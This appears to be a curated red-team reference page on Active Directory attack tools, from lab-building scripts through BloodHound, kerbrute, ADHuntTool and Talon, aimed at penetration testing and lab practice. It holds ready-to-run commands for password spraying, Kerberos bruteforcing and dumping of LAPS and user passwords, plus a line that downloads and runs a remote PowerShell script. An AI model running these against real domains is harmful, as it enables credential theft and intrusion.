Active Directory
Vulnerable-AD: Create a vulnerable AD via this script.

Supported Attacks

  • Abusing ACLs/ACEs
  • Kerberoasting
  • AS-REP Roasting
  • Abuse DnsAdmins
  • Password in Object Description
  • User Objects With Default password (Changeme123!)
  • Password Spraying
  • DCSync
  • Silver Ticket
  • Golden Ticket
  • Pass-the-Hash
  • Pass-the-Ticket
  • SMB Signing Disabled
    # if you didn't install Active Directory yet, you can try
    Install-ADDSForest -CreateDnsDelegation:$false -DatabasePath "C:\Windows\NTDS" -DomainMode "7" -DomainName "cs.org" -DomainNetbiosName "cs" -ForestMode "7" -InstallDns:$true -LogPath "C:\Windows\NTDS" -NoRebootOnCompletion:$false -SysvolPath "C:\Windows\SYSVOL" -Force:$true
    # if you already installed Active Directory, just run the script!
    IEX((new-object net.webclient).downloadstring("https://raw.githubusercontent.com/wazehell/vulnerable-AD/master/vulnad.ps1"));
    Invoke-VulnAD -UsersLimit 100 -DomainName "cs.org"
GitHub - WazeHell/vulnerable-AD: Create a vulnerable active directory that's allowing you to test most of the active directory attacks in a local lab
bloodhound: BloodHound is an application developed with one purpose: to find relationships within an Active Directory (AD) domain to discover attack paths.
More BloodHound Cypher queries (phackt.com)
BloodHound Cypher Cheatsheet (hausec)
Max: Maximizing BloodHound. Max is a good boy.
cypheroth: Automated, extensible toolset that runs cypher queries against Bloodhound's Neo4j backend and saves output to spreadsheets.
    ./cypheroth.sh -u neo4j -p BloodHound -d TESTLAB.LOCAL -a localhost:7687 -v true -t 10s
InveighZero: InveighZero is a C# LLMNR/NBNS/mDNS/DNS/DHCPv6 spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system. This version shares many features with the PowerShell version of Inveigh.
CrackMapExec: CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.
EXE version to use along with Windows machines (e.g., Commando-VM).
GitHub - maaaaz/CrackMapExecWin: The great CrackMapExec tool compiled for Windows
FindUncommonShares: The script FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 that lets you quickly find uncommon shares in vast Windows Active Directory domains.
KerberosUserEnum: Kerberos account enumeration taking advantage of AS-REQ. I wrote this script to practice my understanding of Kerberos.
    ./Enum.py --file=/tmp/usernames --dcip=192.168.88.1 --domain=TESTDOMAIN --port=88
kerbrute: A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.
Kerbrute has three main commands:
  • bruteuser - Bruteforce a single user's password from a wordlist
  • bruteforce - Read username:password combos from a file or stdin and test them
  • passwordspray - Test a single password against a list of users
  • userenum - Enumerate valid domain usernames via Kerberos
    ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
    ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
    ./kerbrute_linux_amd64 bruteforce --dc 192.168.x.x -d domain users.txt --safe -o out.txt
ldapdomaindump: Active Directory information dumper via LDAP.
ADSearch: A tool written for Cobalt Strike's execute-assembly command that allows for more efficient querying of AD.
ADHuntTool: official repo for the AdHuntTool. C# script used for Red Team. It can be used by Cobalt Strike execute-assembly or as a standalone executable.
    Usage: ADHuntTool.exe options domain [arguments]

    ADHuntTool.exe Set
    ADHuntTool.exe DumpLocalAdmin RingZer0 *optional*computername
    ADHuntTool.exe DumpLocalGroup RingZer0 *optional*computername
    ADHuntTool.exe DumpRemoteSession RingZer0 *optional*computername
    ADHuntTool.exe DumpWkstaSession RingZer0 *optional*computername
    ADHuntTool.exe CheckAdmin RingZer0 *optional*computername
    ADHuntTool.exe DumpTrust RingZer0
    ADHuntTool.exe DumpAllUsers RingZer0
    ADHuntTool.exe DumpUser RingZer0 mr.un1k0d3r
    ADHuntTool.exe DumpUsersEmail RingZer0
    ADHuntTool.exe DumpAllComputers RingZer0
    ADHuntTool.exe DumpComputer RingZer0 DC01
    ADHuntTool.exe DumpAllGroups RingZer0
    ADHuntTool.exe DumpGroup RingZer0 "Domain Admins"
    ADHuntTool.exe DumpPasswordPolicy Ringzer0,DC=local
    ADHuntTool.exe DumpCertificateTemplates Ringzer0,DC=local
    ADHuntTool.exe DumpPwdLastSet RingZer0
    ADHuntTool.exe DumpLastLogon RingZer0
    ADHuntTool.exe CheckManaged RingZer0
    ADHuntTool.exe DumpLapsPassword RingZer0 *optional*computername
    ADHuntTool.exe DumpUserPassword RingZer0
    ADHuntTool.exe DumpRemoteSession RingZer0 *optional*computername
    ADHuntTool.exe PasswordBruteForce RingZer0 *optional*username (samaccountname)
    ADHuntTool.exe GetShare target *optional*Domain\Username Password
    ADHuntTool.exe GetService target *optional*Domain\Username Password
GitHub - Mr-Un1k0d3r/ADHuntTool: official repo for the AdHuntTool (part of the old RedTeamCSharpScripts repo)
Talon: Talon is a tool designed to perform automated password guessing attacks while remaining undetected. Talon can enumerate a list of users to identify which users are valid, using Kerberos. Talon can also perform a password guessing attack against the Kerberos and LDAPS (LDAP Secure) services. Talon can use either a single domain controller or multiple ones to perform these attacks, randomizing each attempt between the domain controllers and services (LDAP or Kerberos).
    # ./Talon -Hostfile DCs -Userfile ValidUsers -D STARLABS.local -P "Password!" -sleep 2

    (Talon ASCII-art banner omitted)
    (@Tyl0us)

    [-] 172.16.144.186 STARLABS.LOCAL\ballen:Password! = Failed
    [-] 172.16.144.185 STARLABS.LOCAL\csnow:Password! = Failed
    [-] 172.16.144.186 STARLABS.LOCAL\wwest:Password! = User's Account Locked
    [*] Account lock out detected - Do you want to continue.[y/n]:
RemotePotato0: RemotePotato0 is an exploit that allows you to escalate your privileges from a generic User to Domain Admin.
